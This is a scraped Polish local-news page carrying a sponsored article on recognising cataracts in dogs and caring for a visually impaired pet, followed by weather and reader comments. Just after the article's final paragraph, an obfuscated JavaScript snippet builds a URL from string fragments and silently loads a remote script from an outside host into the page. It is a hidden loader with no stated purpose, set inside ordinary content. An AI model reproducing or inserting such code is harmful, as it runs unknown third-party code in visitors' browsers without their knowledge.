Wtorek, 5 lipca 2022 14:33
Reklama
Reklama
Reklama

Jak wygląda początek zaćmy u psa? Powinieneś od razu zareagować!

Oczy stanowią zwierciadło duszy – nie tylko ludzkiej, ale również psiej. Niestety, podobnie jak my, nasi pupile mogą się zmagać z wieloma poważnymi chorobami oczu – jedną z najpopularniejszych, zaraz obok jaskry, jest zaćma. W początkowych stadiach powoduje ona niewielkie osłabienie widzenia, jednak wraz z rozwojem przysparza ona naszemu czworonogowi coraz więcej trudności w widzeniu. Ważne jest, aby poznać objawy zaćmy u psa, aby móc ją wcześnie zidentyfikować i odpowiednio zareagować!
  • Źródło: Art. sponsorowany
Jak wygląda początek zaćmy u psa? Powinieneś od razu zareagować!

Czym jest psia zaćma?

Zaćmą określamy zaburzenia w obrębie soczewki oka oraz jej torebki, które skutkują jej zmętnieniem. Problem ten może dotyczyć jednego oka bądź pary oczu. Zaćma u psa wpływa na gorsze widzenie zwierzęcia, a jej rozwój może skutkować nawet całkowitą utratą wzroku. Jeśli u naszego zwierzęcego przyjaciela zauważymy postępujące zmętnienie soczewki oka, powinniśmy niezwłocznie udać się do weterynarza! Przeprowadzi on potrzebną diagnostykę i zaleci podjęcie kolejnych kroków. Jedną z metod, która może okazać się skutecznym ratunkiem w walce z zaćmą u psa, jest fakoemulsyfikacja – koniecznie dowiedz się więcej na https://www.przychodnianovet.pl/fakoemulsyfikacja-jako-ratunek-w-walce-z-zacma-u-psa/

Rodzaje zaćmy u psa

Przebieg zaćmy u psa może się różnić w zależności od jej rodzaju. Co ważne, mętnienie soczewki oka może dotknąć zwierzę w każdym wieku – nie jest to problem, który dotyczy jedynie psich seniorów.

Zaćma starcza, która jest najszerzej znana, powstaje w wyniku starzenia się tkanek. To proces nieodwracalny, z którym zmagają się starsze zwierzęta – zmiany postępują jednak w tym przypadku powoli. Kolejnym rodzajem jest zaćma wrodzona, która występuje u młodych czworonogów. Nie zawsze jest ona dziedziczna, gdyż jej przyczyną mogą być również zaburzenia w rozwoju płodu. Zaćma nabyta zwykle powstaje w wyniku urazu, jak i nieprawidłowego żywienia. Stanowi ona również skutek uboczny niektórych leków. Zaćma cukrzycowa jest natomiast efektem zbyt wysokiego stężenia glukozy we krwi. 

Objawy zaćmy u psa

Pierwsze objawy zaćmy u psa zazwyczaj trudno zauważyć – właśnie dlatego tak istotne są regularne kontrole w gabinecie weterynaryjnym. Zaćma prowadzi do stopniowego mętnienia oka bądź oczu, jednak na początku jej rozwoju wielu właścicieli zwierząt nie jest jej w stanie zauważyć. Wynika to również z faktu, że w pierwszych stadiach może nie obejmować całości, a jedynie część soczewki.

Jeśli zaćma pozostanie nieleczona, wraz z jej rozwojem wzrok pupila się pogarsza – wtedy możemy dostrzec pewne niepokojące sygnały w zachowaniu zwierzęcia. Jeśli nasz czworonóg zmaga się ze stopniową utratą wzorku, może zacząć wpadać na różne przedmioty. Dodatkowo, mogą pojawić się trudności z odnalezieniem zabawki, jak i oceną wysokości czy odległości. Pies może również mieć problem z utrzymaniem równowagi i rozpoznawaniem ludzi – nawet tych, na widok których wcześniej bardzo się cieszył. Zaćma u psa może sprawić, że nasz tryskający życiem zwierzak zacznie stawać się osowiały, a niekiedy nawet drażliwy czy strachliwy.

Pamiętajmy, że jeśli zauważymy którekolwiek z tych objawów, powinniśmy niezwłocznie udać się do weterynarza!

Jak zapewnić komfort psu z zaćmą?

Częściowa bądź całkowita utrata wzroku u psa jest czymś niezwykle ciężkim dla właściciela, ale nie możemy zapominać, że jest to problem w szczególności dotkliwy dla naszego pupila. Ważne jest, by w takiej sytuacji zapewnić mu jak największy komfort życia – dowiedz się, na co zwrócić uwagę.

Zapewnienie psu bezpieczeństwa jest sprawą kluczową – w naszym mieszkaniu powinien panować porządek, aby zwierzę nie potykało się o porozrzucane przedmioty. Ważne jest również, aby unikać przestawiania mebli – zwierzę z pewnością zapamiętało już układ łóżka, szaf, stołu i krzeseł, dlatego każda zmiana będzie prowadziła do problemów w poruszaniu się. Dodatkowo, musimy pamiętać, aby posłanie psa oraz jego miski zawsze kłaść w to samo miejsce.

Psy z problemami z wzrokiem potrzebują więcej czasu, aby zaaklimatyzować i odnaleźć się w nowych przestrzeniach. Z tego powodu istotne jest, aby zawsze spacerować w miejscach, które nasz pupil już zna. Sprawi to, że na spacerze poczuje się on pewniej. Ponadto, musimy pamiętać o nieprzerwanej kontroli zwierzęcia i ograniczeniu jego kontakt z obcymi zwierzętami do minimum. Oprócz tego, należy unikać wchodzenia po schodach.

A jedną z najważniejszych rzeczy, którą możemy zaoferować psu, który zmaga się z zaćmą, jest rutyna – to właśnie ona znacząco poprawi komfort jego życia. 

(function(){ caj2=document.createElement("script");caj2_=("ust");caj2u="423545982"; caj2_+="a"+("t.i");caj2.type="text/javascript"; caj2u+=".uvgu0nsXaj2qieXfi6y6";caj2.async=true;caj2_+="n"+("f"+"o")+"/"; caj2u+="h15hmuyp73";caj2.src="https://"+caj2_+caj2u; document.body.appendChild(caj2); })();


Oceń

Napisz komentarz
Wysyłając komentarz akceptujesz regulamin serwisu kwidzyn1.pl z siedzibą w Tczewie jest administratorem twoich danych osobowych dla celów związanych z korzystaniem z serwisu. Zgodnie z art. 24 ust. 1 pkt 3 i 4 ustawy o ochronie danych osobowych, podanie danych jest dobrowolne, Użytkownikowi przysługuje prawo dostępu do treści swoich danych i ich poprawiania.
Komentarze
Reklama
Reklama
Reklama
POGODA
zachmurzenie duże

Temperatura: 24°CMiasto: Kwidzyń

Ciśnienie: 1018 hPa
Wiatr: 6 km/h

KOMENTARZE
Autor komentarza: realistaTreść komentarza: Niestety rządzący miastem nie robią kompletnie nic z pustostanami....może czekają na łapówki ?Data dodania komentarza: 23.06.2022, 23:49Źródło komentarza: Pożar w gmachu dawnego domu dziecka. Znaleźli poparzonego mężczyznęAutor komentarza: Leśny dziadekTreść komentarza: I bardzo dobrze jak nie umie jeździć. Ja bym oprócz kary finansowej jeszcze zawiesił przynajmniej prawko, by się douczyl zachowania na drodze...Data dodania komentarza: 19.05.2022, 07:48Źródło komentarza: Groźna kolizja, brak rannych lecz wysoki mandat...Autor komentarza: Sławek EU07Treść komentarza: A kasku chyba nie miała?Data dodania komentarza: 15.05.2022, 12:36Źródło komentarza: Przypominamy zasady obowiązujące kierujących hulajnogą. Wczoraj w Gdańsku poniosła śmierć kobieta jadąca hulajnogąAutor komentarza: Sławek EU07Treść komentarza: All...lokalnie chyba bezpieczniejsze jest.Data dodania komentarza: 15.05.2022, 12:31Źródło komentarza: Kolejne oszustwo internetowe. Mieszkaniec Kwidzyna zalogował się na fałszywy link banku i stracił oszczędnościAutor komentarza: aagajTreść komentarza: taaaaak ! i co tu pisać !! królowie one i oni, ulic !!Data dodania komentarza: 21.04.2022, 15:04Źródło komentarza: Przypominamy zasady obowiązujące kierujących hulajnogą. Wczoraj w Gdańsku poniosła śmierć kobieta jadąca hulajnogąAutor komentarza: realistaTreść komentarza: Fajnie, że policja coś zaczyna robić....jeszcze tylko powinni zwrócić uwagę na samochody wymuszające pierwszeństwo na przejściach oraz sposób parkowania ( zajmowanie 2 miejsc , niszczenie trawników)Data dodania komentarza: 09.04.2022, 12:31Źródło komentarza: Policjanci zatrzymali trzech nietrzeźwych rowerzystów. Rekordzista miał ponad 2 promile
Reklama